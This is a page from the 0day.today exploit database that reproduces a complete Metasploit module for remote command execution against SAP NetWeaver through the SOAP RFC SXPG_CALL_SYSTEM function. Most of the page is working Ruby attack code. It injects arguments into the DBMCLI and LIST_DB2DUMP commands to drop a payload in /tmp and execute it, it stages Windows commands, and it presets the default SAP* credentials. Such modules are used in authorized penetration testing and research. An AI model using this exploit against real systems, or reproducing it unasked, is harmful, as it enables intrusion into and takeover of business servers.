0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
[##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP :)
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',
'Description' => %q{
This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP
RFC Service, to execute remote commands. This module needs SAP credentials with
privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
successfully on Windows 2008 64 bits and Linux 64 bits platforms.
},
'References' =>
[
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
],
'DisclosureDate' => 'Mar 26 2013',
'Platform' => ['win', 'unix'],
'Targets' => [
[ 'Linux',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
#'Payload' =>
#{
#'DisableNops' => true,
#'Space' => 232,
#'Compat' =>
#{
#'PayloadType' => 'cmd',
#'RequiredCmd' => 'perl ruby',
#}
#}
}
],
[ 'Windows x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'win'
}
]
],
'DefaultTarget' => 0,
'Privileged' => false,
'Author' =>
[
'nmonkee'
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8000),
OptString.new('CLIENT', [true, 'SAP Client', '001']),
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('PASSWORD', [true, 'Password', '06071992'])
], self.class)
register_advanced_options(
[
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
], self.class)
end
def send_soap_request(data)
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc',
'method' => 'POST',
'data' => data,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
},
'vars_get' => {
'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN'
}
})
return res
end
def build_soap_request(command, sap_command, sap_os)
data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"
data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">"
data << "<env:Body>"
data << "<n1:SXPG_CALL_SYSTEM xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>"
data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>"
data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>"
data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>"
data << "</n1:SXPG_CALL_SYSTEM>"
data << "</env:Body>"
data << "</env:Envelope>"
return data
end
def check
data = rand_text_alphanumeric(4 + rand(4))
res = send_soap_request(data)
if res and res.code == 500 and res.body =~ /faultstring/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
if target.name =~ /Windows/
linemax = datastore['PAYLOAD_SPLIT']
vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
print_status("#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request")
execute_cmdstager({ :delay => 0.35, :linemax => linemax })
elsif target.name =~ /Linux/
file = rand_text_alphanumeric(5)
stage_one = create_unix_payload(1,file)
print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
res = send_soap_request(stage_one)
if res and res.code == 200 and res.body =~ /External program terminated/
print_good("#{rhost}:#{rport} - Payload dump was successful")
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
end
stage_two = create_unix_payload(2,file)
print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
send_soap_request(stage_two)
end
end
def create_unix_payload(stage, file)
command = ""
if target.name =~ /Linux/
if stage == 1
my_payload = payload.encoded.gsub(" ","\t")
my_payload.gsub!("&","&")
my_payload.gsub!("<","<")
command = "-o /tmp/" + file + " -n pwnie" + "\n!"
command << my_payload
command << "\n"
elsif stage == 2
command = "-ic /tmp/" + file
end
end
return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
end
def execute_command(cmd, opts)
command = cmd.gsub(/&/, "&")
command.gsub!(/%TEMP%\\/, "")
data = build_soap_request("&#{command}", "LIST_DB2DUMP", "ANYOS")
begin
res = send_soap_request(data)
if res and res.code == 200
return
else
if res and res.body =~ /faultstring/
error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
0.upto(error.length-1) do |i|
vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
end
end
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
end
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
end
end
end
# 0day.today [2024-11-15] #